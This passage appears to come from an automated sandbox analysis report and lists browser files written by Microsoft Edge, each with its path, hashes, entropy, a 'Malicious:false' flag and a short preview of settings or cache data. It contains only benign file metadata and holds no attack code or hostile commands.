                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBM+wuF9hDO6vP6O+htbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE068tbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                  MD5:2822A7749035D391154BCDF384344D3C
                                                                                                                                                                                                                                                                  SHA1:2E4E5FD0505BC9281D7CF6B855ED9916FE0439A0
                                                                                                                                                                                                                                                                  SHA-256:6D38B4537085986B4E320AE42E1AD5A8A6007508D112E9A4EC510F9643E68129
                                                                                                                                                                                                                                                                  SHA-512:16FC4DBFDFC9200D000AF5F9919FF2C06F792254443BC470FD74976A63DC8D4ABE8AF026DF852592D003FBC2449D0E9EB3A842601B38A43F60D486D3F222059D
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):47
                                                                                                                                                                                                                                                                  Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                                                                                                  MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                                                                                                  SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                                                                                                  SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                                                                                                  SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):35
                                                                                                                                                                                                                                                                  Entropy (8bit):4.014438730983427
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                                                                                                  MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                                                                                                  SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                                                                                                  SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                                                                                                  SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"forceServiceDetermination":false}

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):81
                                                                                                                                                                                                                                                                  Entropy (8bit):4.3439888556902035
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                                                                                                                                                  MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                                                                                                                                                  SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                                                                                                                                                  SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                                                                                                                                                  SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):130439
                                                                                                                                                                                                                                                                  Entropy (8bit):3.80180718117079
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                                                                                                                                                  MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                                                                                                                                                  SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                                                                                                                                                  SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                                                                                                                                                  SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                                                                                                  Entropy (8bit):4.346439344671015
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                                                                                                                                  MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                                                                                                                                  SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                                                                                                                                  SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                                                                                                                                  SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:synchronousLookupUris_638343870221005468

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris_638343870221005468

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):57
                                                                                                                                                                                                                                                                  Entropy (8bit):4.556488479039065
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                                                                                                                                  MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                                                                                                                                  SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                                                                                                                                  SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                                                                                                                                  SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):29
                                                                                                                                                                                                                                                                  Entropy (8bit):4.030394788231021
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:0xXeZUSXkcVn:0Re5kcV
                                                                                                                                                                                                                                                                  MD5:52E2839549E67CE774547C9F07740500
                                                                                                                                                                                                                                                                  SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
                                                                                                                                                                                                                                                                  SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
                                                                                                                                                                                                                                                                  SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:topTraffic_638004170464094982

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_170540185939602997400506234197983529371

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):575056
                                                                                                                                                                                                                                                                  Entropy (8bit):7.999649474060713
                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                  SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                                                                                                  MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                                                                                                  SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                                                                                                  SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                                                                                                  SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)*d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(|.6.:..f!.>...?M.8......P.D.J.I4.<...*.y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z*.{nZ~d.V.4.u.K.V.......X.<p..cz..>*....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_638004170464094982

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:raw G3 (Group 3) FAX, byte-padded
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):460992
                                                                                                                                                                                                                                                                  Entropy (8bit):7.999625908035124
                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                  SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                                                                                                                                                  MD5:E9C502DB957CDB977E7F5745B34C32E6
                                                                                                                                                                                                                                                                  SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                                                                                                                                                  SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
                                                                                                                                                                                                                                                                  SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:...2lI.5.<C.;.{....._+jE.`..}....-...#.A...KR...l.M0,s...).9..........x.......F.b......jU....y.h'....L<...*..Z..*%.*..._...g.4yu...........'c=..I0..........qW..<:N....<..U.,Mi..._......'(..U.9.!........u....7...4. ..Ea...4.+.79k.!T.-5W..!..@+..$..t|1.E..7F...+..xf....z&_Q...-.B...)8R.c....0.......B.M.Z...0....&v..<..H...3.....N7K.T..D>.8......P.D.J.I4.B.H.VHy...@.Wc.Cl..6aD..j.....E..*4..mI..X]2.GH.G.L...E.F.=.J...@}j~.#...'Y.L[z..1.W/.Ck....L..X........J.NYd........>...N.F..z*.{nZ~d.N..../..6.\L...Q...+.w..p...>.S.iG...0]..8....S..)`B#.v..^.*.T.?...Z.rz.D'.!.T.w....S..8....V.4.u.K.V.......W.6s...Y.).[.c.X.S..........5.X7F...tQ....z.L.X..(3#j...8...i.[..j$.Q....0...]"W.c.H..n..2Te.ak...c..-F(..W2.b....3.]......c.d|.../....._...f.....d....Im..g.b..R.q.<x*x...i2..r.I()Iat..b.j.r@K.+5..C.....nJ.>*P,.V@.....s.4.3..O.r.....smd7...L.....].u&1../t.*.......uXb...=@.....wv......]....#.{$.w......i.....|.....?....E7...}$+..t).E.U..Q..~.`.)..Y@.6.h.......%(

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\downloadCache

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):14
                                                                                                                                                                                                                                                                  Entropy (8bit):3.3787834934861767
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:ZK7q6:ZA
                                                                                                                                                                                                                                                                  MD5:DF741B3F19D9DC2621EAF973C8C9FA9D
                                                                                                                                                                                                                                                                  SHA1:F45F1D9791C05366A8A23322D497C89957E75E61
                                                                                                                                                                                                                                                                  SHA-256:6E5DDBA6D7AA3B287EA364034E1F843E4146FF92C07D8426F4A7C4B0E6435006
                                                                                                                                                                                                                                                                  SHA-512:650DE3F99038BFFBFEF41A9ACC0A06E15803550C6456D0BDEAC9EBE18AEA94AB3A0BB7D85B7A0230CE6F510F5E26FA739FE58924F355D7E3714EC37DAA4C70D2
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:downloadCache_

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\downloadCache_

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):179
                                                                                                                                                                                                                                                                  Entropy (8bit):5.011230774574754
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:YTyLSmafBoTf1cTDfpHXTozRLuLgfGBkGAeekVy8Hfjg9PIAclRWVw8Y4Y:YWLSGTWtXTo9LuLgfGBPAzkVj/EMlkVm
                                                                                                                                                                                                                                                                  MD5:E7456EE515563723FE75EBC35634E228
                                                                                                                                                                                                                                                                  SHA1:47B7BBD27ACE9FC9B838323500AAF9DFA0C80962
                                                                                                                                                                                                                                                                  SHA-256:A446D5C5BC36F81DAC4F6FBED5845A2D29376571B326B6696E45F42185D1C0A8
                                                                                                                                                                                                                                                                  SHA-512:D95992D05A779E431C0811D2974A346ED343CF4FEA01271A780737DDCBB8129B772B1FA1424A82B9C67837DD59255AF8963106EFC21D629D6ED8F553FB6490D0
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"version":1,"cache_data":[{"file_hash":"3fc0b9283b9f5515","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":0,"expiration_time":1734713071434601}]}

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):9
                                                                                                                                                                                                                                                                  Entropy (8bit):3.169925001442312
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:CMzOn:CM6
                                                                                                                                                                                                                                                                  MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                                                                                                                                  SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                                                                                                                  SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                                                                                                                                  SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:uriCache_

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache_

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):179
                                                                                                                                                                                                                                                                  Entropy (8bit):5.009736883685653
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:YTyLSmafBoTf1cTDfpHXTozRLuLgfGBkGAeekVy8HfzXNPIAclRWVeXS2y:YWLSGTWtXTo9LuLgfGBPAzkVj/T8lkV9
                                                                                                                                                                                                                                                                  MD5:92AC17A6A83B6C4952599915563C2BF9
                                                                                                                                                                                                                                                                  SHA1:88244E272609754793F35EE2F8408C459EB8E9AC
                                                                                                                                                                                                                                                                  SHA-256:73E0784AC94A2C7B2AB29764821996C01B0364E870D375CB400B52532A8F1874
                                                                                                                                                                                                                                                                  SHA-512:5D6C9F24CBD43F61123690511CB4E481171284369A89C6364A37E790D50DC9B6222CCBEFF1E33A41F13DEF500DC3272738F6092DD430FC77BD5353AC8041C8CA
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"version":1,"cache_data":[{"file_hash":"3fc0b9283b9f5515","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1734713067712709}]}

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):85
                                                                                                                                                                                                                                                                  Entropy (8bit):4.3488360343066725
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:YQ3JYq9xSs0dMEJAELJ25AmIpozQHn:YQ3Kq9X0dMgAEiLIFn
                                                                                                                                                                                                                                                                  MD5:0E16444393CD322124146935AB837ECC
                                                                                                                                                                                                                                                                  SHA1:AA1A3E9571E3E067421D940601965220711F24AD
                                                                                                                                                                                                                                                                  SHA-256:1B5DE2BF736E2BB182CF64BD8A72BBBD6538A9F33DC8020223B2257BAD6F7D82
                                                                                                                                                                                                                                                                  SHA-512:26C461B0493C5E0F26AA196CE94C0C9EA5D892220EBE882AF4BF2892469515E9B13056EF7AE0F9C429F45C14F334299CCFFA5BAB1547B3DA0E2FCE45131630A0
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"user_experience_metrics.stability.exited_cleanly":true,"variations_crash_streak":3}

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\c2d2b525-a76a-41e8-b5c4-1289701b8ba0.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):44659
                                                                                                                                                                                                                                                                  Entropy (8bit):6.097371021307869
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4xkBowuAhDO6vP6O8PTNBPU2D75q5EJNcGoup1Xl3jVu:z/Ps+wsI7yOE86aNRNchu3VlXr4CRo1
                                                                                                                                                                                                                                                                  MD5:BAF46B551B281040F6258BB11CDA01FA
                                                                                                                                                                                                                                                                  SHA1:E01FBE8983E871CC7B8089089C562C1726198EC8
                                                                                                                                                                                                                                                                  SHA-256:A50EC8633675D20DB81397AAB0E029C2BD82BBA7C797D6E9F16434EE1E55E89A
                                                                                                                                                                                                                                                                  SHA-512:10A3EFE70EFAF6D11C7C1A93B2C1D0BA88C019ACBA015B1F767AC91F8FA353C3578DAA6A2801F239B00C1144FDCDFE7A19A65FBEC0913FA90A56A710B8299610
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\cf48f549-3894-4917-889f-9aa462e2fc93.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):44137
                                                                                                                                                                                                                                                                  Entropy (8bit):6.090752586172201
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBM+wuF9hDO6vP6O+htbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE068tbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                  MD5:2822A7749035D391154BCDF384344D3C
                                                                                                                                                                                                                                                                  SHA1:2E4E5FD0505BC9281D7CF6B855ED9916FE0439A0
                                                                                                                                                                                                                                                                  SHA-256:6D38B4537085986B4E320AE42E1AD5A8A6007508D112E9A4EC510F9643E68129
